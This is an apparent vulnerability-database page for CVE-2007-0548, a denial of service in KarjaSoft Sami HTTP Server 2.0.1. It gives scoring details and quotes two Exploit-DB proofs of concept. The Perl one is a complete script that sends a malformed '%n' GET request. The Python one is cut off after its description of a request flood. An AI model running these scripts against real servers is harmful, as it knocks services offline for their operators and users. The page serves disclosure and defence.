CVE-2007-0548
Published 2007-01-29
CVE-2007-0548: KarjaSoft Sami HTTP Server 2.0.1 allows remote attackers to cause a denial of service (daemon hang) via a large number of requests for nonexistent objects.
Priority: P4 19, medium 5, CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 3.06% (85.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| karjasoft | sami_http_server | — | — |
No detection rules found.
Exploit-DB
Sami HTTP Server 2.0.1 - GET Denial of Service
exploitdb·2010-11-05
---
#!/usr/bin/perl
# Exploit Title: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: [email protected]
# Tested on: Windows XP SP3
# Type: DOS/POC
use IO::Socket;
$target = "127.0.0.1";
$port = 80;
$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
$sock->send($payload);
close($sock);
Exploit-DB
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
exploitdb·2007-01-23
---
#!/usr/bin/env python
import socket
print "-----------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url: http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer, stops"
print "to write to log file and the admin will be unable to kick or ban users."
print "The only thing you can do is to kill the process."
print "-----------------------------------------
No writeups or analysis indexed.
http://osvdb.org/31623
http://secunia.com/advisories/23901
https://exchange.xforce.ibmcloud.com/vulnerabilities/31690
https://www.exploit-db.com/exploits/3182
Published: 2007-01-29